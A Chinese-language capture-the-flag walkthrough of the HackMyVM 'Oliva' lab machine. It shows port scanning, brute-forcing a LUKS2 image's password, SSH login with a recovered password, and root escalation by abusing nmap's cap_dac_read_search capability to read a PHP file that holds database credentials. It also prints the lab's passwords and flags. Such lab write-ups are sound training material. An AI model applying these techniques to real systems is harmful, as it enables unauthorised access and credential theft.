HackMyVM Oliva

信息收集

root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 21:55 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:AA:29:F1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.57 seconds

image-20250519095601211
image-20250519095601211

root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.54
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.54
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 69]
/index.html           (Status: 200) [Size: 615]

image-20250519095720721
image-20250519095720721

LUKS

CLICK 后下载了一个文件 oliva

root@kali:~/oliva# file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
cryptsetup luksOpen oliva oliva

是需要密码的, 原本使用了luks2john 但是只支持luks1, 找到一个bruteforce-luks 支持爆破luks2

root@kali:~/oliva# bruteforce-luks -t 4 -f /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

根本不动,等了半小时,不知道为什么, 就去看了一下wp, 获取了一下password

Password found: bebita
root@kali:~/oliva# cryptsetup luksOpen oliva oliva
输入 oliva 的口令:bebita
root@kali:~/oliva# lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE  MOUNTPOINTS
loop0     7:0    0 19.1M  0 loop
└─oliva 254:0    0  3.1M  0 crypt
sda       8:0    0 80.1G  0 disk
└─sda1    8:1    0 80.1G  0 part

挂载:

root@kali:~/oliva# mount /dev/mapper/oliva /mnt
root@kali:~/oliva# cd /mnt
root@kali:/mnt# ls -al
总计 18
drwxr-xr-x  3 root root  1024 2023年 7月 4日 .
drwxr-xr-x 18 root root  4096  3月 7日 09:15 ..
drwx------  2 root root 12288 2023年 7月 4日 lost+found
-rw-r--r--  1 root root    16 2023年 7月 4日 mypass.txt
root@kali:/mnt# cat mypass.txt
Yesthatsmypass!

使用密码登录到oliva

UserFlag
oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm

提权 Root

oliva@oliva:/opt$ ss -tuln
Netid       State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process
udp         UNCONN       0             0                          0.0.0.0:68                      0.0.0.0:*
tcp         LISTEN       0             80                       127.0.0.1:3306                    0.0.0.0:*
tcp         LISTEN       0             511                        0.0.0.0:80                      0.0.0.0:*
tcp         LISTEN       0             128                        0.0.0.0:22                      0.0.0.0:*
tcp         LISTEN       0             511                           [::]:80                         [::]:*
tcp         LISTEN       0             128                           [::]:22                         [::]:*

发现一个 mysql 服务器, 没有密码

oliva@oliva:~$ getcap -r / 2>/dev/null
oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep
nmap -iL targets.txt

可以使用 nmap -iL 变相的读取文件

oliva@oliva:/var/www/html$ nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-19 05:05 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.05 seconds

数据库密码为: Savingmypass

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| easy               |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,028 sec)

MariaDB [(none)]> use easy;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [easy]> show tables
    -> ;
+----------------+
| Tables_in_easy |
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)

MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,011 sec)

root 密码为: OhItwasEasy!

RootFlag
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7